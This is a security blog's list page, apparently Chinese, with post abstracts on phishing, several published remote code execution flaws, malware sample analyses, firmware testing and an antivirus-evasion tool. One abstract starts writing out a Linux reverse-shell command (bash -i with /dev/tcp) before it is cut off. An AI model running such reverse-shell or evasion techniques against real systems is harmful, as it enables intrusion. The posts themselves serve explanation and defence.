摘要: 上个月参加了某大型网络安全活动,在活动期间,遇到了各种各样的钓鱼攻击,虽然技术性不高,正好自己也做个简单的回顾。钓鱼邮件主要是通过伪造,让你相信邮件中的内容,邮件可以携带文字、图片、网址、附件等多种信息媒介,结合社工手段可以对未经训练的人群进行恶意攻击。在高防护的企业目标上,钓鱼邮件是一个通过人的弱点,打开防护大门的绝佳手段。遇到的钓鱼方式有以下几种: 阅读全文
posted @ 2021-05-27 23:17 安全研究者的日常 阅读(991) 评论(0) 推荐(0) 编辑
摘要: 0x01 漏洞描述 SonicWall SSL-VPN是SonicWall公司旗下的VPN软件。@darrenmartyn公开了SonicWall SSL-VPN 历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall SSL-VPN使用了旧版本内核以及HTTP CGI 可执行程序,攻击者 阅读全文
posted @ 2021-01-27 15:32 安全研究者的日常 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 0x01 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。JumpServer 使用Python / Django 进行开发。2021年1月15日,JumpServer发布更新,修复了一处远程命令执行漏洞。由于 阅读全文
posted @ 2021-01-19 18:34 安全研究者的日常 阅读(870) 评论(0) 推荐(0) 编辑
摘要: 0X00 事件概况 昨天下午被incaseformat这个老病毒刷了一波存在感,C盘以外的盘符文件均被删除,仅保留了一个名为“incaseformat.log”的空文件。 0X01 样本分析 样本由Delphi进行编写,基本情况如下: 文件名 tsay.exe 文件大小 460,288 KB 文件M 阅读全文
posted @ 2021-01-14 14:22 安全研究者的日常 阅读(1270) 评论(0) 推荐(0) 编辑
摘要: 0x01 漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。 漏洞等级:中危。 通过shadon引擎的搜索,目前全球大约有210,685个资产为 该漏洞目前仅影响启用了AnyConnect或WebVPN配置的设备,并且此漏洞不能用于访问ASA或FTD系统文件或... 阅读全文
posted @ 2020-07-26 10:32 安全研究者的日常 阅读(3198) 评论(0) 推荐(0) 编辑
摘要: OWASP固件安全性测试指南固件安全评估,英文名称 firmware security testing methodology 简称 FSTM。该指导方法主要是为了安全研究人员、软件开发人员、顾问、爱好者和信息安全专业人员进行固件安全评估。前景我们基于 FSTM 进行测试流程如下:id阶段描述1信息收集固件的相关技术文档的详细使用说明2获取固件使用本文中介绍的多种办法获取固件3分析固件固... 阅读全文
posted @ 2020-05-15 09:50 安全研究者的日常 阅读(1638) 评论(0) 推荐(0) 编辑
摘要: 0x00 概述 本来是想分析一下Sodinokibi病毒的新的变种,但是分析了一部分,被他的混淆和循环弄得有点头疼,东西还都是压在内存里。偶然翻到几年前的一个样本分析,又重新看了一下,发现自己在逆向这块几年了,也没实质性的提升,真是光阴喂了狗。这个样本是一个挖矿样本,那时候的样本挖矿还是直接CUP干到100%,还没有后来样本那样CUP占用率可配置。整体的恶意样本思路也比较清晰就是挖矿赚钱,尽量让... 阅读全文
posted @ 2020-03-26 00:29 安全研究者的日常 阅读(1515) 评论(0) 推荐(0) 编辑
摘要: 最近,一起做安全测试的兄弟问我:Linux反弹shell的命令是什么,我毫不犹豫地在笔记中找到发给了他,可是脑海中突然闪过有个疑问,为啥这样能反弹shell呢,用了那么多次却从来没有想过这个问题。这是一篇原理的介绍,也是给自己提的一个醒:盲目机械地工作着,没有多少思考的时间,在忙碌中已经找不到工作的本质和初心。 Linux反弹shell的指令如下:bash -i >& /dev/tc... 阅读全文
posted @ 2020-03-26 00:12 安全研究者的日常 阅读(960) 评论(0) 推荐(0) 编辑
摘要: 这几天有点忙,CVE-2020-0796出来了,没静下心来关注一下,显得太不尊重这个漏洞了,今天周末,关注一下,水一篇。 一、漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须 阅读全文
posted @ 2020-03-14 12:24 安全研究者的日常 阅读(15341) 评论(0) 推荐(1) 编辑
摘要: 在红队攻击中,绕杀软是一个比较常见的技术。对于绕过杀软的方法,有基于黑白名单的,有基于shellloader的,也有基于加密与混淆的。最近在发现了这样一款过杀软的工具,推荐给有缘人,嘻嘻。这款工具是基于powershell编写的,主要是powershell与windows下.net的契合度非常好(毕竟是微软的亲儿子)。工具的原理是基于加密与混淆。 工具的流程: 源码来看也不复杂:... 阅读全文
posted @ 2020-03-13 13:58 安全研究者的日常 阅读(773) 评论(0) 推荐(0) 编辑